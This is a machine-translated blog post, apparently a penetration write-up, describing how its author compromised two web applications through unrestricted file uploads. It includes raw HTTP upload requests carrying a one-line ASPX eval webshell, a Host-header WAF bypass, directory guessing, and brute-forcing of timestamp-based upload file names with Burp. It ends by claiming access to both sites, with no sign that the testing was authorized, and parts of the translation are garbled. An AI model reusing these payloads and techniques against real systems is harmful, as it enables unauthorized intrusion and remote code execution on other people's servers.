One file upload, two sites!


Site 1: file upload

Site 2: file upload

If the article is helpful to you, you are welcome to pay attention, like and collect. One click three links support the following Oh!

If you want to communicate and learn together, you can add zkaq222 (note CSDN, but you can't pass it) to learn and make progress together

Site 1: file upload

Source code leaks found

Open your long cherished spicy chicken dictionary, scan and find that the information is leaked, and try to conduct code audit
File location: SimpleDataPlatform.SimpleDataPlatform.fileUpload

Find ProccessRequest to receive the request. You can see that after obtaining a bunch of parameters (initialization), the HandleFiles method is entered

  Follow up HandleFiles for processing. If dateType=ZBJHSB, continue processing the request. dateType is GET parameter transfer

The path is / Uploads/SetData/ZBJHSB, the str name is timestamp, and STR2 (suffix) is not restricted  

OK, this should be a proper upload of any file. As long as there is a return value, the station will be gone. Unfortunately, it doesn't return a value.
Due to the method fileUpload, the file name is


In addition, his existing dictionary exploded and successfully found the file name of 200 returned

Directly construct the upload Form. The name field in the Form should not be specifically set (not found in the code). After contracting, it returns 200. May it really be passed on?

POST /FileUploads.ashx?DataType=ZBJHSB HTTP/1.1
Content-Length: 195
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySVkAJfiOUeRxhsu8
Accept: */*
Connection: close

Content-Disposition: form-data; name="File"; filename="1.aspx"
Content-Type: image/jpeg



Previously, we saw that the format used is yyyymmddhhmmsfff as the file name, and then directly intercept the suffix as ext. moreover, we have a specific path, so we only need to explode the timestamp file name to win the site. We haven't done this before. We might as well try it.

Burst timestamp

Use Powershell to generate a timestamp, and then press go at Burp to send the request package
powershell -c Get-Date -Format yyyyMMddHHmmssfff

Then blast the last 5 digits, that is, ssfff (because the time on the computer may not be accurate, sometimes even 6 digits may be blasted)
I don't know how long I've been waiting


Good luck. I won't say much later.

Site 2: file upload

Find upload interface

Open website http://xxxx:880/zwwpt/#/ A webpack was found   debug mode is not closed. Check JS and find the upload interface

A hidden html page is found, which cannot be found in the front function node


Click the attachment to upload the packet capture


It is found that there is a waf. When the waf is intercepted, 404 will be returned. This is probably the case with the data packet (some other useless parameters are omitted)

POST /jtwpt/Ashxs/BaseInfoTransfer.ashx HTTP/1.1
Cookie: Hm_lvt_a8b89d1c622d63c547c83ec412cc50ef=1631849663; Hm_lvt_69968305fa176c802589452987ebddc8=1631858810
Connection: close

Content-Disposition: form-data; name="uploadfile[]"; filename="1.aspx"
Content-Type: image/jpeg

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>




Modify HOST: is or (ports other than 880 should be OK)

POST /jtwpt/Ashxs/BaseInfoTransfer.ashx HTTP/1.1
Cookie: Hm_lvt_a8b89d1c622d63c547c83ec412cc50ef=1631849663; Hm_lvt_69968305fa176c802589452987ebddc8=1631858810
Connection: close

Content-Disposition: form-data; name="uploadfile[]"; filename="1.aspx
Content-Type: image/jpeg


  Successfully bypassed waf and uploaded successfully, but there is no return path


Find path

However, the / uploads / directory and / image / directory were found earlier



And found that the html is called security_risk.html, construct paths securityrisk and security_risk, security, etc., and then ran the directory
Finally found to exist   This directory


Guess that the file that may be uploaded is probably in this directory, otherwise there is no need to have such a name, and it is also called upload, so try to directly access the file name 1.txt, and the return is 404 


Burst timestamp

According to my humble experience, websites like to use time stamps for naming, so construct the current time stamp and try to explode the time stamp value at the time point near the upload time.
The timestamp is generally 10 bits or 13 bits


The naming rules of forced conversion file names after file upload are generally
1. Random string
We can't guess this type in xxx-xxx-xxx--xxx.jpg format. If there is no directory traversal or return path, we can basically give up

2. Timestamp type

Directly timestamp+.jpg Is the file name (e.g. 16318676.jpg)
time stamp+00001
 time stamp+0001
 time stamp+001
 time stamp+01
 time stamp

3. yymmddHHmm type
This type is generally in the format of 20210917xxxxx. xxxx should be a number at the millisecond level. We can directly use Burp for explosive running. 4-6 bits can still run, and no more can run.
powershell -c Get-Date -Format yyyyMMddHHmm




After sorting out the ideas, let's start blasting. We just need to remember the current time when Burp contracts, obtain the current timestamp, and then use Burp intruder blasting to run. Sorting the past one by one requires about 15 repetitions. Each time I choose the last 5 digits for blasting (there should be no problem with each type as long as the website is not linked and omitted)

After a large amount of blasting, the uploaded text file was found, with the format and content of
After successfully finding the path, there is no need to talk about the following

However, this method still depends on luck, because it is likely that the time of the current server is inconsistent with that of the target website, such as a few hours or even a few days.
   If yes yyyyMMddHHmmssfff In this case, there's basically no way. I think I'm unlucky
   If it is yyyyMMddHHmmss In this case, it is possible to explode the 6-digit number.

  So far, both stations have got permission







Tags: PHP Python security penetration test Web Security

Posted on Mon, 25 Oct 2021 22:50:08 -0400 by tnan